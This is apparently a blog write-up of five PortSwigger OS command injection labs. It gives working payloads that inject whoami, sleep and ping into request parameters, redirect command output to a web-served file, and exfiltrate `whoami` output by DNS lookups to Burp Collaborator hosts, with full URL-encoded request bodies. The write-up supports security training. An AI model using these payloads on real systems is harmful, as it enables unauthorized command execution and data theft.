Post

OS command injection - PortSwigger

Posted Updated
By karim moftah
2 min read

Table of Contents



OS command injection, simple case

Goal : execute the whoami command to determine the name of the current user.

  • intercept and modify a request that checks the stock level.

  • append |whoami or ;whoami to the storeId parameter

  • you can use this alsoproductId=1%26+whoami+%23&storeId=1 it’s encoded with URL encoding (productId=1& whoami #&storeId=1)

  • check the name in the response

os command injection



Blind OS command injection with time delays

Goal : exploit the blind OS command injection vulnerability to cause a 10 second delay.

  • go to submit feedback

  • I tried a lot of payloads in different parameters and finally these payloads solved the lab
    1
2
3

    karim&`ping -c 10 127.0.0.1`#&
OR
karim&`sleep 10`#&
  • put any one in the name or email parameter and send the request



Blind OS command injection with output redirection

Goal : execute the whoami command and retrieve the output.

  • go to submit feedback

  • write the payload from previous lab %26+sleep+10+%23+ (& sleep 10 # ) in the email parameter

  • notice that it takes 10 seconds to respond , so this parameter is vulnerable

  • append the payload to email parameter with URL encoding
    1

    & whoami > /var/www/images/whoami.txt #
  • open any image in new tab , replace its name with whoami.txt



Blind OS command injection with out-of-band interaction

Goal : exploit the blind OS command injection vulnerability to issue a DNS lookup to Burp Collaborator.

  • go to submit feedback

  • submit any values

  • from Burp collaborator client click copy to clipboard

  • send this request POST /feedback/submit to burp repeater

  • add the payload to the email parameter (we know that is the vulnerable parameter from the previous labs)
    1

    &nslookup <your_own>.burpcollaborator.net #&

  • but encode it with URL encoding

  • the request body will look like this
    1

    csrf=UfTw8aBwMGPhF6MGrJy2VBawdAB06GQ5&name=karim&email=123%40gmail.com%26nslookup%20y21kg9ifjgutl206yib4mhvtrkxdl2.burpcollaborator.net%20%23&subject=123&message=123

    os command injection


  • send the request

  • if you go to Burp collaborator client and click pull now , you will see the DNS request to our domain

os command injection



Blind OS command injection with out-of-band data exfiltration

Goal : execute the whoami command and exfiltrate the output via a DNS query to Burp Collaborator.

  • go to submit feedback

  • submit any values

  • from Burp collaborator client click copy to clipboard

  • send this request POST /feedback/submit to burp repeater

  • add the payload to the email parameter (we know that is the vulnerable parameter from the previous labs)

    1

    & nslookup `whoami`.79etnipoqp12sb7f5ridtq22yt4nsc.burpcollaborator.net #&

  • but encode it with URL encoding

  • the request body will look like this
    1

    csrf=5mJNRXmKKLVevRpFlC9NqvcKUm5LwMJH&name=karim&email=123%40g.com%26%20nslookup%20%60whoami%60.79etnipoqp12sb7f5ridtq22yt4nsc.burpcollaborator.net%20%23&subject=123&message=123

  • send the request

  • if you go to Burp collaborator client and click pull now , you will see the DNS request to our domain

os command injection

PortSwigger
PortSwigger writeup penetration testing OS command injection
This post is licensed under CC BY 4.0 by the author.